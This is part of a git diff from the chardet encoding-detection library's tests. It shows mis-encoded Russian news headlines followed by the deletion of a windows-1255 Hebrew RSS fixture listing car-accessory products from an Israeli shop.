נאםוםט. ׳ועגונמ סקטעא‏עס ןנמןאגרטלט בוח גוסעט. - ֲ לטנו - Tue, 3 Jan 2006 10:52:00 +0300 - - - - - - - - - - - - - - - - - - - - ִגמו גמוםםמסכףזאשטץ ןמדטבכט םא ֿֿ ג ׳וקםו - http://www.newsru.com/russia/03jan2006/chechen.html - ֿמהגונדס מבסענוכף ֿֿ םא מךנאטםו נאיצוםענא ףנקאכמי. ֽוטחגוסעםו כטצא טח אגעמלאעטקוסךמדמ מנףזט מבסענוככט םאנה גמוםםמסכףזאשטץ ֲםףענוםםטץ גמיסך, מסףשוסעגכגרטי המסלמענ אגעמענאםסןמנעא. - ֲ ׀מססטט - Tue, 3 Jan 2006 10:34:00 +0300 - - - - - ֲחנג םא ראץעו ג ׁ״ְ: 13 דמנםךמג ןנמןאכט בוח גוסעט - http://www.newsru.com/world/03jan2006/mine.html - ֲחנג ןנמטחמרוכ םא ףדמכםמי ראץעו ג ַאןאהםמי ֲטנהזטםטט. ׁןאסאעוכל ןמךא םו ףהאועס ףסעאםמגטע ךמםעאךע ס דמנםךאלט, ךמעמנו ןנוהןמכמזטעוכםמ בכמךטנמגאם םא דכףבטםו ג 80 לוענמג. - ֲ לטנו - Tue, 3 Jan 2006 10:21:00 +0300 - - - - - - - - "ֳאחןנמל": ׃ךנאטםא ןנמהמכזאוע גמנמגאע, םמ ןמסעאגךאל ‎עמ םו ןמלוראוע - http://www.newsru.com/finance/03jan2006/gas.html - ֿנוחטהוםע ׃ךנאטם שוםךמ ףעגונזהאוע, קעמ דאחמענאםסןמנעםא סטסעולא סענאם מבוסןוקטגאוע ענאםחטע. "ֳאחןנמל" מבושאוע וגנמןויסךטל ןמענובטעוכל ךמלןוםסאצטט, ףעגונזהא, קעמ ׃ךנאטםא ןנמהמכזאוע םוסאםךצטמםטנמגאםםמ מעבטנאע נמססטיסךטי דאח. - ךמםמלטךא - Tue, 3 Jan 2006 10:11:00 +0300 - - - - - - - - - ׁןוצמןונאצט ג ִאדוסעאםו: ףבטע 5 במוגטךמג ט 2 לטכטצטמםונא - http://www.newsru.com/russia/03jan2006/oper.html - ֲ ץמהו לאסרעאבםמי סןוצמןונאצטט ןמ בכמךטנמגאםט‏ דנףןן במוגטךמג ג ׃םצףךףכסךמל נאימםו ִאדוסעאםא נאםוםט ןמכףקטכט 7 סמענףהםטךמג ןנאגממץנאםטעוכםץ מנדאםמג, הגמו טח םטץ סךמםקאכטס. ֿמעונט במוגטךמג מצוםטגא‏עס ג ןע ףבטעץ. ְךעטגםא פאחא סןוצמןונאצטט ס םאסעףןכוםטול עולםמע ןנטמסעאםמגכוםא. - ֲ ׀מססטט - Tue, 3 Jan 2006 09:48:00 +0300 - - - - - - - - 2050 דמהף ג לטנו ןמגעס םמגו סגונץהונזאג. ׀מססט ןנמהמכזטע ןמסעוןוםםמ גלטנאע - http://www.newsru.com/world/03jan2006/future.html - טעאי ך 2050 דמהף סעאםוע סאלמי למשםמי ‎ךמםמלטקוסךמי הונזאגמי ןכאםוע, ָםהט - לטנמגל כטהונמל ןמ קטסכוםםמסעט םאסוכוםט, עמדהא ךאך ׀מססט ס ףלוםרטגרטלס םאסוכוםטול גמיהוע ג הוסעךף ןמ למשט ‎ךמםמלטךט. - ֲ לטנו - Tue, 3 Jan 2006 09:42:00 +0300 - - - - - - - ֽאגמהםוםטו ג ָםהמםוחטט: קטסכמ ןמדטברטץ ןנוגסטכמ 50 קוכמגוך - http://www.newsru.com/world/03jan2006/flood.html - ָח-חא ןנמהמכזאגרטץס הגא הם ןמהנה המזהוי ג נאימםו ֿאםעט ןנמטחמרוכ דטדאםעסךטי מןמכחום ט גרכא טח בונודמג נוךא, ג נוחףכעאעו קודמ למשםו ןמעמךט גמה ט דנחט מבנףרטכטס םא םוסךמכךמ בכטחכוזאשטץ הונוגום. - ֲ לטנו - Tue, 3 Jan 2006 09:26:00 +0300 - - - - - - - - ֲ ּמסךגו גמ געמנםטך בףהוע למנמחםמ - http://www.newsru.com/russia/03jan2006/pogoda.html - ֲ סעמכטצו סעמכבטך עונלמלוענא םו מןףסעטעס םטזו מעלועךט 1-3 דנאהףסא למנמחא, א ןמ מבכאסעט - 1-6 דנאהףסמג. ֲועונ בףהוע ‏דמ-גמסעמקםל, ףלונוםםל ט םו ןנוגסטע 3-8 לוענמג ג סוךףםהף. - ֲ ׀מססטט - Tue, 3 Jan 2006 09:15:00 +0300 - - - - - diff --git a/chardet/tests/windows-1255-hebrew/carshops.co.il.xml b/chardet/tests/windows-1255-hebrew/carshops.co.il.xml deleted file mode 100644 index cf66c5b..0000000 --- a/chardet/tests/windows-1255-hebrew/carshops.co.il.xml +++ /dev/null @@ -1,2385 +0,0 @@ - - - - - <![CDATA[CarShops - שיפורים לרכב]]> - - - - - - - - - - - <![CDATA[מוט מייצב OMP]]> - http://www.carshops.co.il/products/532.html - http://www.carshops.co.il/products/532.html - - - - - <![CDATA[סט אחורי לפורד טרנספורט, T4, מושחר.]]> - http://www.carshops.co.il/products/531.html - http://www.carshops.co.il/products/531.html - - - - - <![CDATA[סט איתות לפוקוס, במגן.]]> - http://www.carshops.co.il/products/530.html - http://www.carshops.co.il/products/530.html - - - - - <![CDATA[סט אחורי לפורד פוקוס, 5 דלתות, מושחר.]]> - http://www.carshops.co.il/products/529.html - http://www.carshops.co.il/products/529.html - - - - - <![CDATA[סט אחורי לפורד פוקוס, 5 דלתות.]]> - http://www.carshops.co.il/products/528.html - http://www.carshops.co.il/products/528.html - - - - - <![CDATA[סט ראשי לפורד פוקוס.]]> - http://www.carshops.co.il/products/527.html - http://www.carshops.co.il/products/527.html - - - - - <![CDATA[סט אחורי למרצדס 210, 00-02, שקוף.]]> - http://www.carshops.co.il/products/526.html - http://www.carshops.co.il/products/526.html - - - - - <![CDATA[סט אחורי למרצדס 210, 00-02, מושחר.]]> - http://www.carshops.co.il/products/525.html - http://www.carshops.co.il/products/525.html - - - - - <![CDATA[סט ראשי למרצדס 210, 00-02]]> - http://www.carshops.co.il/products/524.html - http://www.carshops.co.il/products/524.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 5 החל מ-01, אדום-שחור.]]> - http://www.carshops.co.il/products/523.html - http://www.carshops.co.il/products/523.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 5 החל מ-01, מוכסף.]]> - http://www.carshops.co.il/products/522.html - http://www.carshops.co.il/products/522.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 5 96-00, שחור-אדום.]]> - http://www.carshops.co.il/products/521.html - http://www.carshops.co.il/products/521.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 5 96-00, שקוף.]]> - http://www.carshops.co.il/products/520.html - http://www.carshops.co.il/products/520.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 5 96-00, לבן-אדום.]]> - http://www.carshops.co.il/products/519.html - http://www.carshops.co.il/products/519.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 00-02, 4 דלתות. מושחר.]]> - http://www.carshops.co.il/products/518.html - http://www.carshops.co.il/products/518.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 00-02, 4 דלתות.]]> - http://www.carshops.co.il/products/517.html - http://www.carshops.co.il/products/517.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3, 01+, 4 דלתות. שקוף.]]> - http://www.carshops.co.il/products/516.html - http://www.carshops.co.il/products/516.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3, 01+, 4 דלתות.]]> - http://www.carshops.co.il/products/515.html - http://www.carshops.co.il/products/515.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3, 98-01, 2 דלתות, שקוף.]]> - http://www.carshops.co.il/products/514.html - http://www.carshops.co.il/products/514.html - - - - - <![CDATA[סט ראשי לב.מ.וו סדרה 3, 84-93, מושחר.]]> - http://www.carshops.co.il/products/513.html - http://www.carshops.co.il/products/513.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 92-99, 4 דלתות, שקוף.]]> - http://www.carshops.co.il/products/512.html - http://www.carshops.co.il/products/512.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 92-99, 4 דלתות, אדום-לבן.]]> - http://www.carshops.co.il/products/511.html - http://www.carshops.co.il/products/511.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 92-99 לבן שקוף, 4 דלתות.]]> - http://www.carshops.co.il/products/510.html - http://www.carshops.co.il/products/510.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 92-99 4 דלתות, מושחר.]]> - http://www.carshops.co.il/products/509.html - http://www.carshops.co.il/products/509.html - - - - - <![CDATA[סט איתות לב.מ.וו סדרה 3 91-97 קופה.]]> - http://www.carshops.co.il/products/508.html - http://www.carshops.co.il/products/508.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 91-97 מושחר.]]> - http://www.carshops.co.il/products/507.html - http://www.carshops.co.il/products/507.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 91-97 לבן-אדום, שקוף.]]> - http://www.carshops.co.il/products/506.html - http://www.carshops.co.il/products/506.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 91-97 לבן-אדום.]]> - http://www.carshops.co.il/products/505.html - http://www.carshops.co.il/products/505.html - - - - - <![CDATA[סט אחורי לב.מ.וו סדרה 3 91-97 קופה, שקוף.]]> - http://www.carshops.co.il/products/504.html - http://www.carshops.co.il/products/504.html - - - - - <![CDATA[סט אחורי לאסטרה 99+ שטיישן, מושחר.]]> - http://www.carshops.co.il/products/503.html - http://www.carshops.co.il/products/503.html - - - - - <![CDATA[סט אחורי לאסטרה 99+ מושחר.]]> - http://www.carshops.co.il/products/502.html - http://www.carshops.co.il/products/502.html - - - - - <![CDATA[סט אחורי לאסטרה 99+ סטיישן, שקוף.]]> - http://www.carshops.co.il/products/501.html - http://www.carshops.co.il/products/501.html - - - - - <![CDATA[סט אחורי לאסטרה 99+ שקוף 1.]]> - http://www.carshops.co.il/products/500.html - http://www.carshops.co.il/products/500.html - - - - - <![CDATA[סט ראשי לאופל אסטרה 98+ כפול FF-H.]]> - http://www.carshops.co.il/products/499.html - http://www.carshops.co.il/products/499.html - - - - - <![CDATA[סט ראשי לאופל אסטרה 98+ מושחר.]]> - http://www.carshops.co.il/products/498.html - http://www.carshops.co.il/products/498.html - - - - - <![CDATA[סט ראשי לאופל אסטרה 98+]]> - http://www.carshops.co.il/products/497.html - http://www.carshops.co.il/products/497.html - - - - - <![CDATA[סט ראשי לפסט 97-00]]> - http://www.carshops.co.il/products/496.html - http://www.carshops.co.il/products/496.html - - - - - <![CDATA[סט אחורי לפסט 97-00]]> - http://www.carshops.co.il/products/495.html - http://www.carshops.co.il/products/495.html - - - - - <![CDATA[סט אחורי לבורה 99+]]> - http://www.carshops.co.il/products/494.html - http://www.carshops.co.il/products/494.html - - - - - <![CDATA[סט אחורי לגולף 98-04, עגול כסף \ עגול שחור.]]> - http://www.carshops.co.il/products/493.html - http://www.carshops.co.il/products/493.html - - - - - <![CDATA[סט אחורי לגולף 98-04, אדום.]]> - http://www.carshops.co.il/products/492.html - http://www.carshops.co.il/products/492.html - - - - - <![CDATA[סט אחורי לגולף 98-04, שקוף אדום\שחור.]]> - http://www.carshops.co.il/products/491.html - http://www.carshops.co.il/products/491.html - - - - - <![CDATA[סט אחורי לגולף 98-04, מוכסף.]]> - http://www.carshops.co.il/products/490.html - http://www.carshops.co.il/products/490.html - - - - - <![CDATA[סט אחורי לגולף 98-04, כחול.]]> - http://www.carshops.co.il/products/489.html - http://www.carshops.co.il/products/489.html - - - - - <![CDATA[סט אחורי לגולף 98-04, שחור.]]> - http://www.carshops.co.il/products/488.html - http://www.carshops.co.il/products/488.html - - - - - <![CDATA[סט אחורי לגולף 98-04, שקוף אדום\כסוף.]]> - http://www.carshops.co.il/products/487.html - http://www.carshops.co.il/products/487.html - - - - - <![CDATA[סט אחורי לגולף 98-04, שקוף.]]> - http://www.carshops.co.il/products/486.html - http://www.carshops.co.il/products/486.html - - - - - <![CDATA[סט ערפל לגולף, 98-04.]]> - http://www.carshops.co.il/products/485.html - http://www.carshops.co.il/products/485.html - - - - - <![CDATA[סט אחורי לגולף 92-97 + מסכה.]]> - http://www.carshops.co.il/products/484.html - http://www.carshops.co.il/products/484.html - - - - - <![CDATA[סט אחורי לגולף 92-97, ירוק.]]> - http://www.carshops.co.il/products/483.html - http://www.carshops.co.il/products/483.html - - - - - <![CDATA[סט אחורי לגולף 92-97, כחול.]]> - http://www.carshops.co.il/products/482.html - http://www.carshops.co.il/products/482.html - - - - - <![CDATA[סט אחורי לגולף 92-97, שחור.]]> - http://www.carshops.co.il/products/481.html - http://www.carshops.co.il/products/481.html - - - - - <![CDATA[סט ראשי לגולף 84-91, מושחר.]]> - http://www.carshops.co.il/products/480.html - http://www.carshops.co.il/products/480.html - - - - - <![CDATA[סט ראשי לגולף, 3 רפלקטורים.]]> - http://www.carshops.co.il/products/479.html - http://www.carshops.co.il/products/479.html - - - - - <![CDATA[סט ראשי לגולף 98-04, רקע כחול \ שחור.]]> - http://www.carshops.co.il/products/478.html - http://www.carshops.co.il/products/478.html - - - - - <![CDATA[סט ראשי לגולף 98-04, מושחר.]]> - http://www.carshops.co.il/products/477.html - http://www.carshops.co.il/products/477.html - - - - - <![CDATA[סט ראשי לגולף 92-97 דגם 98]]> - http://www.carshops.co.il/products/476.html - http://www.carshops.co.il/products/476.html - - - - - <![CDATA[סט ראשי לגולף 92-97, כפול מושחר]]> - http://www.carshops.co.il/products/475.html - http://www.carshops.co.il/products/475.html - - - - - <![CDATA[סט אחורי לפולו, 00-01, מושחר 2.]]> - http://www.carshops.co.il/products/474.html - http://www.carshops.co.il/products/474.html - - - - - <![CDATA[סט אחורי לפולו, 00-01, מושחר.]]> - http://www.carshops.co.il/products/473.html - http://www.carshops.co.il/products/473.html - - - - - <![CDATA[סט אחורי לפולו, 00-01, מוכסף לדים.]]> - http://www.carshops.co.il/products/472.html - http://www.carshops.co.il/products/472.html - - - - - <![CDATA[סט אחורי לפולו, 00-01, כחול לדים.]]> - http://www.carshops.co.il/products/471.html - http://www.carshops.co.il/products/471.html - - - - - <![CDATA[סט ערפל לפולו 00-01, רגיל.]]> - http://www.carshops.co.il/products/470.html - http://www.carshops.co.il/products/470.html - - - - - <![CDATA[סט אחורי לפולו 95-99, + מסכה.]]> - http://www.carshops.co.il/products/469.html - http://www.carshops.co.il/products/469.html - - - - - <![CDATA[סט אחורי לפולו 95-99, שחור.]]> - http://www.carshops.co.il/products/468.html - http://www.carshops.co.il/products/468.html - - - - - <![CDATA[סט אחורי לפולו 95-99, ירוק.]]> - http://www.carshops.co.il/products/467.html - http://www.carshops.co.il/products/467.html - - - - - <![CDATA[סט אחורי לפולו 95-99, כחול.]]> - http://www.carshops.co.il/products/466.html - http://www.carshops.co.il/products/466.html - - - - - <![CDATA[סט אחורי לפולו 95-99, רקע שחור.]]> - http://www.carshops.co.il/products/465.html - http://www.carshops.co.il/products/465.html - - - - - <![CDATA[סט אחורי לקליאו, שקוף.]]> - http://www.carshops.co.il/products/464.html - http://www.carshops.co.il/products/464.html - - - - - <![CDATA[סט אחורי ל-307, שקוף ניקל.]]> - http://www.carshops.co.il/products/463.html - http://www.carshops.co.il/products/463.html - - - - - <![CDATA[סט אחורי ל-306, מושחר.]]> - http://www.carshops.co.il/products/462.html - http://www.carshops.co.il/products/462.html - - - - - <![CDATA[סט אחורי ל-306, שקוף א\ל.]]> - http://www.carshops.co.il/products/461.html - http://www.carshops.co.il/products/461.html - - - - - <![CDATA[סט אחורי ל-306, שקוף ל\א.]]> - http://www.carshops.co.il/products/460.html - http://www.carshops.co.il/products/460.html - - - - - <![CDATA[סט אחורי ל-206, רקע ניקל.]]> - http://www.carshops.co.il/products/459.html - http://www.carshops.co.il/products/459.html - - - - - <![CDATA[סט אחורי ל-206, רקע שחור.]]> - http://www.carshops.co.il/products/458.html - http://www.carshops.co.il/products/458.html - - - - - <![CDATA[סט אחורי ל-206, מושחר.]]> - http://www.carshops.co.il/products/457.html - http://www.carshops.co.il/products/457.html - - - - - <![CDATA[סט אחורי ל-206, לבן שקוף.]]> - http://www.carshops.co.il/products/456.html - http://www.carshops.co.il/products/456.html - - - - - <![CDATA[סט ראשי ל-206, מושחר.]]> - http://www.carshops.co.il/products/455.html - http://www.carshops.co.il/products/455.html - - - - - <![CDATA[סט אחורי לאיביזה שקוף 2]]> - http://www.carshops.co.il/products/454.html - http://www.carshops.co.il/products/454.html - - - - - <![CDATA[סט אחורי לאיביזה שקוף 1]]> - http://www.carshops.co.il/products/453.html - http://www.carshops.co.il/products/453.html - - - - - <![CDATA[סט אחורי לסיוויק 96-01 א\שקוף]]> - http://www.carshops.co.il/products/452.html - http://www.carshops.co.il/products/452.html - - - - - <![CDATA[סט אחורי לסיוויק 96-01 שקוף א\ש]]> - http://www.carshops.co.il/products/451.html - http://www.carshops.co.il/products/451.html - - - - - <![CDATA[סט אחורי לסיוויק 96-01 שחור שקוף]]> - http://www.carshops.co.il/products/450.html - http://www.carshops.co.il/products/450.html - - - - - <![CDATA[סט ערפל לסיוויק 96-00]]> - http://www.carshops.co.il/products/449.html - http://www.carshops.co.il/products/449.html - - - - - <![CDATA[סט אחורי לסיוויק הצ'בק 92-95 סיב פחם]]> - http://www.carshops.co.il/products/448.html - http://www.carshops.co.il/products/448.html - - - - - <![CDATA[סט אחורי לסיוויק הצ'בק 92-95 שחור\פחם]]> - http://www.carshops.co.il/products/447.html - http://www.carshops.co.il/products/447.html - - - - - <![CDATA[סט אחורי לסיוויק 92-95 4דל']]> - http://www.carshops.co.il/products/446.html - http://www.carshops.co.il/products/446.html - - - - - <![CDATA[סט אחורי לסיוויק הצ'בק 92-95 כרום]]> - http://www.carshops.co.il/products/445.html - http://www.carshops.co.il/products/445.html - - - - - <![CDATA[סט אחורי לסיוויק הצ'בק 92-95 פחם]]> - http://www.carshops.co.il/products/444.html - http://www.carshops.co.il/products/444.html - - - - - <![CDATA[סט אחורי לסיוויק 92-95 פחם]]> - http://www.carshops.co.il/products/443.html - http://www.carshops.co.il/products/443.html - - - - - <![CDATA[סט אחורי לסיוויק 92-95 שחור]]> - http://www.carshops.co.il/products/442.html - http://www.carshops.co.il/products/442.html - - - - - <![CDATA[סט אחורי לסיוויק 92-95 סיב פחם]]> - http://www.carshops.co.il/products/441.html - http://www.carshops.co.il/products/441.html - - - - - <![CDATA[סט ערפל לסיוויק 3 דל']]> - http://www.carshops.co.il/products/440.html - http://www.carshops.co.il/products/440.html - - - - - <![CDATA[סט ערפל לסיוויק 4 דל']]> - http://www.carshops.co.il/products/439.html - http://www.carshops.co.il/products/439.html - - - - - <![CDATA[סט אחורי A6 מוכסף \ שחור]]> - http://www.carshops.co.il/products/438.html - http://www.carshops.co.il/products/438.html - - - - - <![CDATA[סט כנף A4]]> - http://www.carshops.co.il/products/437.html - http://www.carshops.co.il/products/437.html - - - - - <![CDATA[סט אחורי A4 מוכסף]]> - http://www.carshops.co.il/products/436.html - http://www.carshops.co.il/products/436.html - - - - - <![CDATA[סט אחורי A4 שקוף אדום עגול]]> - http://www.carshops.co.il/products/435.html - http://www.carshops.co.il/products/435.html - - - - - <![CDATA[סט אחורי A4 שקוף אדום]]> - http://www.carshops.co.il/products/434.html - http://www.carshops.co.il/products/434.html - - - - - <![CDATA[סט אחורי A3 צבעוני]]> - http://www.carshops.co.il/products/433.html - http://www.carshops.co.il/products/433.html - - - - - <![CDATA[סט ראשי A3]]> - http://www.carshops.co.il/products/432.html - http://www.carshops.co.il/products/432.html - - - - - <![CDATA[כונס אוויר למנוע]]> - http://www.carshops.co.il/products/431.html - http://www.carshops.co.il/products/431.html - - - - - <![CDATA[זוג שטיחים לרכב]]> - http://www.carshops.co.il/products/430.html - http://www.carshops.co.il/products/430.html - - - - - <![CDATA[זוג מראות חשמליות DTM]]> - http://www.carshops.co.il/products/429.html - http://www.carshops.co.il/products/429.html - - - - - <![CDATA[מראה מכנאית DTM]]> - http://www.carshops.co.il/products/428.html - http://www.carshops.co.il/products/428.html - - - - - <![CDATA[זוג מראות חשמליות K6]]> - http://www.carshops.co.il/products/427.html - http://www.carshops.co.il/products/427.html - - - - - <![CDATA[מראה מכנאית K6]]> - http://www.carshops.co.il/products/426.html - http://www.carshops.co.il/products/426.html - - - - - <![CDATA[פנס נאון אולטרה חלק]]> - http://www.carshops.co.il/products/425.html - http://www.carshops.co.il/products/425.html - - - - - <![CDATA[סט מגני טמבון]]> - http://www.carshops.co.il/products/424.html - http://www.carshops.co.il/products/424.html - - - - - <![CDATA[מד לחץ אויר, שעון]]> - http://www.carshops.co.il/products/423.html - http://www.carshops.co.il/products/423.html - - - - - <![CDATA[גשר תאורה כסוף ללא פנסים]]> - http://www.carshops.co.il/products/422.html - http://www.carshops.co.il/products/422.html - - - - - <![CDATA[מקרר לרכב וצידנית ענקית 24 ליטר]]> - http://www.carshops.co.il/products/421.html - http://www.carshops.co.il/products/421.html - - - - - <![CDATA[יחידת כוח ניידת לכל מטרה]]> - http://www.carshops.co.il/products/420.html - http://www.carshops.co.il/products/420.html - - - - - <![CDATA[פנס נאון המתחבר למצית]]> - http://www.carshops.co.il/products/419.html - http://www.carshops.co.il/products/419.html - - - - - <![CDATA[פנס מליון אור מתחבר למצית]]> - http://www.carshops.co.il/products/418.html - http://www.carshops.co.il/products/418.html - - - - - <![CDATA[פנס מוסך פלסטיק]]> - http://www.carshops.co.il/products/417.html - http://www.carshops.co.il/products/417.html - - - - - <![CDATA[ספרי לניקוי ריפודים]]> - http://www.carshops.co.il/products/416.html - http://www.carshops.co.il/products/416.html - - - - - <![CDATA[סט גופיות קומפלט לרכב]]> - http://www.carshops.co.il/products/415.html - http://www.carshops.co.il/products/415.html - - - - - <![CDATA[מחזיק פנקס]]> - http://www.carshops.co.il/products/414.html - http://www.carshops.co.il/products/414.html - - - - - <![CDATA[מחזיק פחית למזגן]]> - http://www.carshops.co.il/products/413.html - http://www.carshops.co.il/products/413.html - - - - - <![CDATA[גגון לרכב פרטי ללא מרזב]]> - http://www.carshops.co.il/products/412.html - http://www.carshops.co.il/products/412.html - - - - - <![CDATA[כיסוי הגה דמוי עץ]]> - http://www.carshops.co.il/products/411.html - http://www.carshops.co.il/products/411.html - - - - - <![CDATA[קופסאת נורות חרום]]> - http://www.carshops.co.il/products/410.html - http://www.carshops.co.il/products/410.html - - - - - <![CDATA[סט פיוז תקע 10 יח']]> - http://www.carshops.co.il/products/409.html - http://www.carshops.co.il/products/409.html - - - - - <![CDATA[סט פיוז מקסי]]> - http://www.carshops.co.il/products/408.html - http://www.carshops.co.il/products/408.html - - - - - <![CDATA[צ'יפ מנוע להונדה 90-95]]> - http://www.carshops.co.il/products/407.html - http://www.carshops.co.il/products/407.html - - - - - <![CDATA[כיסוי הגה פורמולה]]> - http://www.carshops.co.il/products/406.html - http://www.carshops.co.il/products/406.html - - - - - <![CDATA[ערכת טיפוח מושלמת לרכב]]> - http://www.carshops.co.il/products/405.html - http://www.carshops.co.il/products/405.html - - - - - <![CDATA[מפתח פלאגים]]> - http://www.carshops.co.il/products/404.html - http://www.carshops.co.il/products/404.html - - - - - <![CDATA[מפתח צלב]]> - http://www.carshops.co.il/products/403.html - http://www.carshops.co.il/products/403.html - - - - - <![CDATA[מגבה עגלה 2 טון]]> - http://www.carshops.co.il/products/402.html - http://www.carshops.co.il/products/402.html - - - - - <![CDATA[מגבה מתנפח 3 טון]]> - http://www.carshops.co.il/products/401.html - http://www.carshops.co.il/products/401.html - - - - - <![CDATA[מגבה מספרים 1 טון]]> - http://www.carshops.co.il/products/400.html - http://www.carshops.co.il/products/400.html - - - - - <![CDATA[מגבה הדראולי 4 טון]]> - http://www.carshops.co.il/products/399.html - http://www.carshops.co.il/products/399.html - - - - - <![CDATA[מגבה הדראולי 2 טון]]> - http://www.carshops.co.il/products/398.html - http://www.carshops.co.il/products/398.html - - - - - <![CDATA[מטף כיבוי נייד 3,000 גר']]> - http://www.carshops.co.il/products/397.html - http://www.carshops.co.il/products/397.html - - - - - <![CDATA[מטף כיבוי נייד 1,000 גר']]> - http://www.carshops.co.il/products/396.html - http://www.carshops.co.il/products/396.html - - - - - <![CDATA[קומפרסור שטוח 250]]> - http://www.carshops.co.il/products/395.html - http://www.carshops.co.il/products/395.html - - - - - <![CDATA[קומפרסור מתכת לרכבי שטח]]> - http://www.carshops.co.il/products/394.html - http://www.carshops.co.il/products/394.html - - - - - <![CDATA[קומפרסור בוכנה כפולה]]> - http://www.carshops.co.il/products/393.html - http://www.carshops.co.il/products/393.html - - - - - <![CDATA[שואב אבק לרכב]]> - http://www.carshops.co.il/products/392.html - http://www.carshops.co.il/products/392.html - - - - - <![CDATA[סט כבלי התנעה 500 אמפר]]> - http://www.carshops.co.il/products/391.html - http://www.carshops.co.il/products/391.html - - - - - <![CDATA[סט כבלי התנעה 150 אמפר]]> - http://www.carshops.co.il/products/390.html - http://www.carshops.co.il/products/390.html - - - - - <![CDATA[מפצל מצית X4]]> - http://www.carshops.co.il/products/389.html - http://www.carshops.co.il/products/389.html - - - - - <![CDATA[מפצל מצית X2]]> - http://www.carshops.co.il/products/388.html - http://www.carshops.co.il/products/388.html - - - - - <![CDATA[מיני מקרר נייד מהודר 16 ליטר]]> - http://www.carshops.co.il/products/387.html - http://www.carshops.co.il/products/387.html - - - - - <![CDATA[פנס מוסך ממתכת]]> - http://www.carshops.co.il/products/386.html - http://www.carshops.co.il/products/386.html - - - - - <![CDATA[פוליש NO-7]]> - http://www.carshops.co.il/products/385.html - http://www.carshops.co.il/products/385.html - - - - - <![CDATA[ספרי לסקאי ולוחות שעונים]]> - http://www.carshops.co.il/products/384.html - http://www.carshops.co.il/products/384.html - - - - - <![CDATA[ספרי מחדש צמיגים S.T.P]]> - http://www.carshops.co.il/products/383.html - http://www.carshops.co.il/products/383.html - - - - - <![CDATA[תיק מקצועי קטן לכלי עבודה Sparco]]> - http://www.carshops.co.il/products/380.html - http://www.carshops.co.il/products/380.html - - - - - <![CDATA[תיק לכלי עבודה גדול Sparco]]> - http://www.carshops.co.il/products/379.html - http://www.carshops.co.il/products/379.html - - - - - <![CDATA[נעלי נהיגה K-mid Sparco]]> - http://www.carshops.co.il/products/378.html - http://www.carshops.co.il/products/378.html - - - - - <![CDATA[חליפת Rookie Sparco]]> - http://www.carshops.co.il/products/377.html - http://www.carshops.co.il/products/377.html - - - - - <![CDATA[מתאם להגה Sparco]]> - http://www.carshops.co.il/products/376.html - http://www.carshops.co.il/products/376.html - - - - - <![CDATA[הגה Flash5]]> - http://www.carshops.co.il/products/375.html - http://www.carshops.co.il/products/375.html - - - - - <![CDATA[הגה LAP5]]> - http://www.carshops.co.il/products/374.html - http://www.carshops.co.il/products/374.html - - - - - <![CDATA[הגה RING]]> - http://www.carshops.co.il/products/373.html - http://www.carshops.co.il/products/373.html - - - - - <![CDATA[סוגרי ברזל]]> - http://www.carshops.co.il/products/372.html - http://www.carshops.co.il/products/372.html - - - - - <![CDATA[סוגרי אלומיניום]]> - http://www.carshops.co.il/products/371.html - http://www.carshops.co.il/products/371.html - - - - - <![CDATA[ריפוד לחגורה SPARCO]]> - http://www.carshops.co.il/products/370.html - http://www.carshops.co.il/products/370.html - - - - - <![CDATA[חגורת בטיחות 3 נק' Sparco]]> - http://www.carshops.co.il/products/369.html - http://www.carshops.co.il/products/369.html - - - - - <![CDATA[כפפות מכונאי Meca 2]]> - http://www.carshops.co.il/products/368.html - http://www.carshops.co.il/products/368.html - - - - - <![CDATA[כפפות Pro-Kart]]> - http://www.carshops.co.il/products/367.html - http://www.carshops.co.il/products/367.html - - - - - <![CDATA[ערכה לניקוי פילטר SPARCO]]> - http://www.carshops.co.il/products/366.html - http://www.carshops.co.il/products/366.html - - - - - <![CDATA[חומר לניקוי פילטר אויר]]> - http://www.carshops.co.il/products/365.html - http://www.carshops.co.il/products/365.html - - - - - <![CDATA[שמן לפילטר פתוח]]> - http://www.carshops.co.il/products/364.html - http://www.carshops.co.il/products/364.html - - - - - <![CDATA[דוושות Reflex]]> - http://www.carshops.co.il/products/363.html - http://www.carshops.co.il/products/363.html - - - - - <![CDATA[שק עור לידית בלם]]> - http://www.carshops.co.il/products/362.html - http://www.carshops.co.il/products/362.html - - - - - <![CDATA[שק עור לידית הילוכים]]> - http://www.carshops.co.il/products/361.html - http://www.carshops.co.il/products/361.html - - - - - <![CDATA[ידית הילוכים Racing]]> - http://www.carshops.co.il/products/360.html - http://www.carshops.co.il/products/360.html - - - - - <![CDATA[ידית הילוכים X-speed]]> - http://www.carshops.co.il/products/359.html - http://www.carshops.co.il/products/359.html - - - - - <![CDATA[ידית הילוכים Techno]]> - http://www.carshops.co.il/products/358.html - http://www.carshops.co.il/products/358.html - - - - - <![CDATA[ידית הילוכים Fast-R]]> - http://www.carshops.co.il/products/357.html - http://www.carshops.co.il/products/357.html - - - - - <![CDATA[כסא ספורט Siena]]> - http://www.carshops.co.il/products/356.html - http://www.carshops.co.il/products/356.html - - - - - <![CDATA[פוד קורה לשלושה שעונים]]> - http://www.carshops.co.il/products/355.html - http://www.carshops.co.il/products/355.html - - - - - <![CDATA[פוד קורה לשעון אחד]]> - http://www.carshops.co.il/products/354.html - http://www.carshops.co.il/products/354.html - - - - - <![CDATA[פגוש אחורי לרכב בעיצוב אישי]]> - http://www.carshops.co.il/products/349.html - http://www.carshops.co.il/products/349.html - - - - - <![CDATA[פגוש קדמי לרכב בעיצוב אישי]]> - http://www.carshops.co.il/products/342.html - http://www.carshops.co.il/products/342.html - - - - - <![CDATA[ספוילר נמוך לרכב]]> - 